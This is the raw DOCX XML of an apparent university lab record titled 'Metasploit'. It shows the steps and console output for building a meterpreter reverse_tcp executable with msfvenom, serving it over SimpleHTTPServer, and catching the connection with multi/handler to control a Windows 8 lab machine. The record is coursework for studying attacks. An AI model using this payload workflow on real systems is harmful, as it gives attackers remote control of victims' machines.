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AA790" w14:textId="2A808508" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7965"/>
        </w:tabs>
        <w:spacing w:before="79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Ex. No.: </w:t>
      </w:r>
      <w:r w:rsidR="00484C8E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Date:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFB0620" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="0072214D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before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26B6B0" w14:textId="77777777" w:rsidR="0072214D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123" w:right="10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METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523B7F90" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="0072214D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="2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F999A71" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="9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2C6C6CD" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="8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set up Metasploit framework and exploit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reverse_tcp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Windows 8 machine remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC599F0" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="0072214D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DAF6281" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="90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7C62D24A" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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Generate payload to be inserted into the remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A6295" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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the LHOST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port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314D827" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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msfconsole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B52AE8" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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Use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3BDED8" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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Establish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reverse_tcp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the remote windows 8 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E0F921" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="381"/>
        </w:tabs>
        <w:spacing w:before="1"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SimpleHTTPServer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port number 8000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C26026" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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web browser in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF60A2" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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Windows 8 machine and type http://172.16.8.155:8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5ADDA0" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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get the information about Windows 8 machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF51480" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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left="140" w:right="5218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directory using the     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24203005" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="381"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="380" w:right="52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command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEE82B" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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left="140" w:right="5218" w:firstLine="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.Delete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created directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D5D83" w14:textId="77777777"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677944A7" w14:textId="77777777" w:rsidR="0072214D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4BB840" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="2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:~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msfvenom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-p windows/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meterpreter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reverse_tcp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LHOST=172.16.8.155 LPORT=443 -f exe &gt; /root/hi.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE83336" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:righ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[-] No platform was selected, choosing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Msf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Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70016ECA" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="4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encoder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specified, outputting raw payload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size: 341 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020422DD" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="66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 size of exe file: 73802 bytes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:~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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73BA25EA" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="1"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[-] ***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Metasploit Framework console...\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D739A" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="860" w:right="1464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[-] * WARNING: No database support: could not connect to server: Connection refused Is the server running on host "localhost"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and accepting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158B397" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="532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TCP/IP connections on port 5432? could not connect to server: Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EE56C3" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="860" w:right="26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server running on host "localhost" (127.0.0.1) and accepting TCP/IP connections on port 5432?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C834571" w14:textId="77777777"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BD3BE" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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[-] ***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C71C1B" w14:textId="77777777"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E09DC" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="3440"/>
        </w:tabs>
        <w:spacing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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401CEC6D" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="574"/>
          <w:tab w:val="left" w:pos="1249"/>
          <w:tab w:val="left" w:pos="1544"/>
          <w:tab w:val="left" w:pos="2986"/>
          <w:tab w:val="left" w:pos="3581"/>
          <w:tab w:val="left" w:pos="4255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 \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/\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/_/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30A6F195" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1371"/>
          <w:tab w:val="left" w:pos="2351"/>
          <w:tab w:val="left" w:pos="2766"/>
          <w:tab w:val="left" w:pos="3546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 |\ / |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\ \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| | / \ _ \ \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8EAEC2" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1172"/>
          <w:tab w:val="left" w:pos="2168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| | \/| | |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\ |- -| /\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\ | -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 | || | || | |- -|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD302D8" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1319"/>
          <w:tab w:val="left" w:pos="3128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|_| | | | _|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 |_ / -\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\ \   | |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| | \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/| | | |_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D21056B" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
          <w:tab w:val="left" w:pos="1875"/>
          <w:tab w:val="left" w:pos="2756"/>
          <w:tab w:val="left" w:pos="3438"/>
          <w:tab w:val="left" w:pos="4031"/>
          <w:tab w:val="left" w:pos="4811"/>
        </w:tabs>
        <w:spacing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|/ |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/ \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\/ /\ \\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/   \/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\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|_\ \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\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D9918B" w14:textId="77777777"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3B159C4" w14:textId="77777777"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65CD66A1" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4600"/>
        </w:tabs>
        <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5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metasploit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v5.0.41-dev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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E711B2" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5322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-- --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1914 exploits - 1074 auxiliary - 330 post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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EA006" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5291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-- --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556 payloads - 45 encoders - 10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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6DCF29" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4243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-- --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 evasion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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B12E97" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4243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msf5 &gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25551067" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="26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msf5 exploit(multi/handler) &gt; set payload windows/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meterpreter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reverse_tcp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payload =&gt; windows/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meterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B630613" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="57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msf5 exploit(multi/handler) &gt; show options Module options (exploit/multi/handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ECEBC2" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto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Current Setting Required Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D37B0" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="7" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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A6DDFD3" wp14:editId="44308947">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>584200</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="760730" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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2535" y="3779365"/>
                          <a:ext cx="760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730" h="1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="76009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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="760730" cy="12700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7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50F4AA7" wp14:editId="06AFA4B0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>317500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="201295" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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42253" y="3779365"/>
                          <a:ext cx="201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1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="20129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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="201295" cy="1270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2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B4DBA5F" wp14:editId="0FF39E77">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1422400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="407669" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" dist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39066" y="3779365"/>
                          <a:ext cx="4076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669" h="1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="40766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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="407669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66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012E771" wp14:editId="404593F8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1905000</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="558800" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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63501" y="3779365"/>
                          <a:ext cx="55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0" h="1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="55816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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5588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EE15FB" w14:textId="77777777"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3CE1D1E" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="0072214D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before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53FE70E" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="90" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="31" w:right="477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Payload options (windows/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meterpreter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reverse_tcp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2F8FF827" w14:textId="77777777"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FB195" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="931"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="477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Current Setting Required Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBC6A8F" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="7" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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84A7A98" wp14:editId="6C4DE977">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>736600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="760730" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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2535" y="3779365"/>
                          <a:ext cx="760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730" h="1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="76009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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="76073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7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040268AE" wp14:editId="6B7684CB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558800" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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63501" y="3779365"/>
                          <a:ext cx="55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0" h="1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="55816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7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5588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3CD158AE" wp14:editId="4643EBA5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1574800</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="407035" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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39383" y="3779365"/>
                          <a:ext cx="407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035" h="1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="4070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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="407035" cy="12700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0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36B3EA04" wp14:editId="2F256376">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>317500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="201295" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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42253" y="3779365"/>
                          <a:ext cx="201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1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="20129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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="201295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2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50CA17" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2412"/>
          <w:tab w:val="left" w:pos="2944"/>
          <w:tab w:val="left" w:pos="3152"/>
          <w:tab w:val="left" w:pos="3684"/>
        </w:tabs>
        <w:spacing w:before="68" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="320" w:right="10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EXITFUNC process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yes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Exit technique (Accepted: '',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thread, process, none) LHOST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listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56659B89" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1380"/>
          <w:tab w:val="left" w:pos="2640"/>
          <w:tab w:val="left" w:pos="3379"/>
        </w:tabs>
        <w:spacing w:line="274" w:lineRule="auto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LPORT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4444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The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130CC60B" w14:textId="77777777"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6C163D5B" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="320" w:right="8538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Exploit target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CB017" w14:textId="77777777"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C28B7" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="320" w:right="85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 Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F2BD76" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="7" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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48656EB3" wp14:editId="765491C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>317500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="100965" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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92418" y="3779365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1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="10096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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="100965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25698DCF" wp14:editId="5D720441">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>482600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="203834" cy="12700"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom distT="0" distB="0"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40983" y="3779365"/>
                          <a:ext cx="2038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4" h="1270" extrusionOk="0">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="20319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7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101600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="203834" cy="127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85B2E8F" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="68" w:line="240" w:lineRule="auto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Wildcard Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1603DB" w14:textId="77777777"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9ED595" w14:textId="77777777"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687473B1" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="45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msf5 exploit(multi/handler) &gt; set LHOST 172.16.8.155 LHOST =&gt; 172.16.8.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568740D7" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="140" w:right="54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msf5 exploit(multi/handler) &gt; set LPORT 443 LPORT =&gt; 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF60DC" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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msf5 exploit(multi/handler) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C388DA" w14:textId="77777777"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5DE1F" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="00000000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[*] Started reverse TCP handler on 172.16.8.155:443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56073DAD" w14:textId="77777777"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ED5FDB2" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="0072214D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8F8136B" w14:textId="77777777"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179E49" w14:textId="77777777"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D54547" w14:textId="77777777"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EF1D5" w14:textId="77777777"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CE0D69" w14:textId="77777777"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09DBA3" w14:textId="77777777"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6258DE" w14:textId="77777777"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38CE72" w14:textId="77777777"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DE2EC5" w14:textId="77777777"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1FC728" w14:textId="77777777"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2308BD" w14:textId="77777777"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AE2D3E" w14:textId="77777777"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A39F89" w14:textId="77777777"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624584" w14:textId="77777777"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C88A22" w14:textId="77777777"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42BD4E" w14:textId="77777777"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A4F1C5" w14:textId="77777777" w:rsidR="00000088" w:rsidRDefault="00000088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728C6D" w14:textId="706548C0" w:rsidR="0072214D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="231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1F8207B1" w14:textId="77777777" w:rsidR="0072214D" w:rsidRDefault="0072214D"/>
    <w:sectPr w:rsidR="0072214D" w:rsidSect="00D5159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D779B" w14:textId="77777777" w:rsidR="00A60A70" w:rsidRDefault="00A60A70" w:rsidP="00000088">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="21B2CAA7" w14:textId="77777777" w:rsidR="00A60A70" w:rsidRDefault="00A60A70" w:rsidP="00000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A5FBC" w14:textId="77777777" w:rsidR="00871985" w:rsidRDefault="008719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837CA" w14:textId="77777777" w:rsidR="00871985" w:rsidRDefault="008719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4194C" w14:textId="77777777" w:rsidR="00871985" w:rsidRDefault="00871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55F0C" w14:textId="77777777" w:rsidR="00A60A70" w:rsidRDefault="00A60A70" w:rsidP="00000088">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5FC5C8EC" w14:textId="77777777" w:rsidR="00A60A70" w:rsidRDefault="00A60A70" w:rsidP="000000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123B7" w14:textId="77777777" w:rsidR="00871985" w:rsidRDefault="008719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8E7E4" w14:textId="3E39B324" w:rsidR="00871985" w:rsidRPr="00871985" w:rsidRDefault="00871985" w:rsidP="00871985">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="2868"/>
      </w:tabs>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00871985">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">Reg no: 210701083      </w:t>
    </w:r>
    <w:r w:rsidRPr="00871985">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00871985">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00871985">
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:tab/>
      <w:t xml:space="preserve"> Name: Hemanth Kumar D</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="47B4E674" w14:textId="77777777" w:rsidR="00871985" w:rsidRDefault="00871985" w:rsidP="00871985">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:lang w:val="en-IN"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="03F15FD0" w14:textId="007C7E60" w:rsidR="00000088" w:rsidRPr="00871985" w:rsidRDefault="00000088" w:rsidP="008719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3EB59" w14:textId="77777777" w:rsidR="00871985" w:rsidRDefault="008719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6906E5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="440E62CE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="380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347" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2315" w:hanging="240"/>
      </w:pPr>
    </w:lvl>
